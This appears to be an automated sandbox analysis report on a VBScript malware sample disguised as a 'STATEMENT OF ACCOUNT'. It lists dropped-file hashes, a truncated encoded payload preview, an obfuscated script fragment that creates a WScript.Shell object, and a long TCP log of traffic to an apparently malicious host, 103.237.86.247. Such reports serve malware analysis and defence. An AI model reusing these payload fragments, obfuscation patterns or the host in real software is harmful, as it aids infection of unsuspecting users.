                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..

                  C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..

                  C:\Users\user\AppData\Roaming\Fejdede.ell

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):459120
                  Entropy (8bit):5.856893664227236
                  Encrypted:false
                  SSDEEP:12288:YJx+XiX6EVg2riq3BpFxfBdxPadN1RQtoNTiX4e:Y/+4Vg0X3tadHRQt8mR
                  MD5:E3CAB8D063E34C00E20F8471C7139F8A
                  SHA1:3989A2C4B539E6DAC33FDA4C13F980FB46C24537
                  SHA-256:095EB2A212EC912605CDCDE4DEB442B7539C0724C868EB9FD6E1DDC7D3381620
                  SHA-512:E8FCBEBE748AAA6355EB8190E1F42C96DA946F1A87ABB4051C2914CCD9F3C8A70C521A9C26C5F37F76C70E6482FD162CFDBEAE5B7C876C7EDDAD497CCBA36512
                  Malicious:false
                  Preview:cQGb6wJ34LuEwRYA6wLGrnEBmwNcJARxAZvrAvFduXw0WCVxAZvrAh8+gfEd6fh+6wKVW+sCzhaB6WHdoFtxAZvrAibl6wIz8esCdkW6uTbc1usCh8nrArJccQGbcQGbMcrrAkJc6wK5BIkUC+sCPZJxAZvR4usC80ZxAZuDwQTrAtJA6wLezYH5PNH5AXzKcQGbcQGbi0QkBOsCI+HrAjIxicPrAlLjcQGbgcPqRLYB6wKXmHEBm7qXUKjhcQGbcQGbgeofabDWcQGb6wJ3BIHCiBgI9esCyATrAnP3cQGbcQGbcQGbcQGbiwwQ6wJALnEBm4kME3EBm3EBm0LrAo/k6wLP7IH6VNQEAHXWcQGbcQGbiVwkDHEBm3EBm4HtAAMAAHEBm+sCjXiLVCQIcQGbcQGbi3wkBHEBm3EBm4nr6wJSlHEBm4HDnAAAAHEBm3EBm1PrAvQFcQGbakBxAZvrAqekietxAZvrAiOmx4MAAQAAAKATAnEBm3EBm4HDAAEAAOsCZyxxAZtT6wL6busCvyiJ6+sC9aJxAZuJuwQBAABxAZvrAoh2gcMEAQAAcQGbcQGbU3EBm+sCF0Zq/+sC/VzrAvHXg8IF6wKn7XEBmzH26wLcjesCJRExyXEBm+sC3mSLGnEBm3EBm0HrAgUrcQGbORwKdfNxAZvrAtyxRnEBm3EBm4B8Cvu4dd7rAoqB6wLZXItECvxxAZtxAZsp8HEBm+sCNnr/0nEBm3EBm7pU1AQA6wJgmXEBmzHA6wLnzOsCEWqLfCQM6wJdQusC2vaBNAfX1quxcQGbcQGbg8AEcQGb6wJ2+DnQdeXrAliicQGbiftxAZvrAnm0/9dxAZtxAZteM2z0al9nOxBXxgxC+NkCVqMW15U2LzCSa8WS0LnnTppr3ktXKLXkXjMScw/dODA+rcXMNldadXpVITAmTWy87FJ7dpPbq7YQhZ/jbTirsddXUQZ8aeG+Wi9rtdeMKsXa1jH7TZUq

                  Static File Info

                  General

                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):5.422111260485721
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:STATEMENT OF ACCOUNT.vbs
                  File size:24'744 bytes
                  MD5:229da25a75bd9df3b4bd92268ed0d2fe
                  SHA1:fe45ca4366c5f7a5bc6df83bc66e18b691041f4f
                  SHA256:ec41d23e297c8f8aa407ef610a8f3082a1e103addf113cfe3e4d2ec6733b54e8
                  SHA512:539709f48c888e79211b914089adc5840a322436f8d9e65341982458ceb67abfe37e5d843535e59e21e070724afbcb376509946aec2a5909d7bf57d9931917e1
                  SSDEEP:384:SfIpd2uRhZtoznRlsAfQNoQyOK0hDHFdcFNbVTQIhRpoOn:SMd2uRLtoUAfQNoQyaDl2TQI2On
                  TLSH:FAB22A9619110FBC8A031BBA452B34F8C172197F67B568D05C38606EF8A66DC3F1BF86
                  File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Recompute = Smagsdommeren......Set Nonimpressionist = CreateObject("WScript.Shell")......Call Unmineralizeds("cls;write")..Call Unmineralized

                  File Icon

                  Icon Hash:68d69b8f86ab9a86

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 10:27:03.598133087 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:03.939790010 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:03.939876080 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:03.940207958 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:03.944987059 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914321899 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914340973 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914354086 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914407969 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914421082 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:04.914475918 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:04.914607048 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.172465086 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172533989 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172544003 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172559977 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172583103 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172594070 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172604084 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.172621012 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.172662973 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.173305035 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.173340082 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.173351049 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.173365116 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.173384905 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.173394918 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.217209101 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.431489944 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431510925 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431521893 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431528091 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431732893 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431746006 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431756973 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431780100 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431788921 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.431792021 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.431840897 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.431895971 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.432683945 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.432697058 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.432708025 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.432723045 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.432735920 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.432740927 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.432768106 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.432792902 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.520951986 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.576586008 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.693696022 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693717003 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693726063 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693787098 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693794012 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693800926 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.693877935 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.694061995 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694076061 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694072008 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.694088936 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694114923 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.694386959 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694401979 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694444895 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.694448948 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694462061 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694473982 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694487095 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.694504023 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.694514990 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.695360899 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.695372105 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.695398092 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.695410013 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.695411921 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.695421934 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.695449114 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.695461035 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.954504013 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954533100 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954545975 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954560995 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954575062 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954623938 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954627037 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.954637051 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954668999 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.954668999 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954679012 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.954690933 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954701900 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954714060 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954720974 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954735041 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.954750061 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.954771042 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.955385923 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955398083 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955411911 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955431938 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.955452919 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955465078 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955471039 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.955477953 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955490112 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955508947 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.955517054 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.955533981 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.956334114 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956346035 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956398964 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.956398964 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956412077 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956423998 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956438065 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956450939 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.956453085 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956465960 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.956471920 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:05.956496954 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:05.998338938 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.212810993 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212825060 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212835073 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212901115 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212918997 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212929010 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212940931 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212959051 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212969065 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212980986 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.212991953 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213005066 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213115931 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.213154078 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.213675022 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213685989 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213727951 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213733912 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.213784933 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213795900 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213807106 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.213833094 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.213860989 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214055061 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214092970 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214103937 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214143991 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214189053 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214200974 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214210987 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214224100 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214236975 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214262009 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214709044 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214720011 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214731932 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214761972 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214777946 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214796066 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214807987 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214823961 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214837074 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214850903 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214880943 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.214888096 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214899063 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214911938 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.214937925 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.215626955 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215643883 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215660095 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215671062 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215675116 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.215682983 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215692997 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.215698004 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.215722084 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.264044046 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.304017067 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.357821941 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473506927 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473526955 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473539114 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473584890 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473622084 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473634005 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473645926 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473659039 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473678112 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473706961 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473797083 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473808050 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473819971 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473831892 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473844051 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473856926 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.473944902 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473958015 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.473968983 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474006891 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.474036932 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.474410057 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474421978 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474432945 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474443913 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474456072 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474462032 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.474467993 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.474488020 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.474509001 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475250006 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475261927 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475291967 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475410938 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475425005 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475435019 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475445032 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475457907 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475464106 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475503922 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475667953 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475678921 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475692034 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475703955 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475716114 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475718975 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475727081 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475739002 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.475740910 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475763083 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.475780010 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476006031 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476016998 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476027966 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476061106 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476172924 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476186037 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476196051 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476207018 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476217985 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476223946 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476231098 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476243019 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476253033 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476274967 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476289988 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476315975 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476490974 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476501942 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476512909 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.476535082 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.476550102 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.477157116 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.477168083 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.477179050 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.477189064 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.477200985 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.477231026 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.477253914 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.731992006 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732012987 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732024908 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732037067 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732053041 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732115030 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732172012 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732194901 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732211113 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732240915 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732305050 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732317924 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732331038 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732345104 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732347965 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732357025 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732381105 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732407093 CEST4973180192.168.2.4103.237.86.247
                  Jul 2, 2024 10:27:06.732418060 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732430935 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732441902 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732455015 CEST8049731103.237.86.247192.168.2.4
                  Jul 2, 2024 10:27:06.732472897 CEST4973180192.168.2.4103.237.86.247
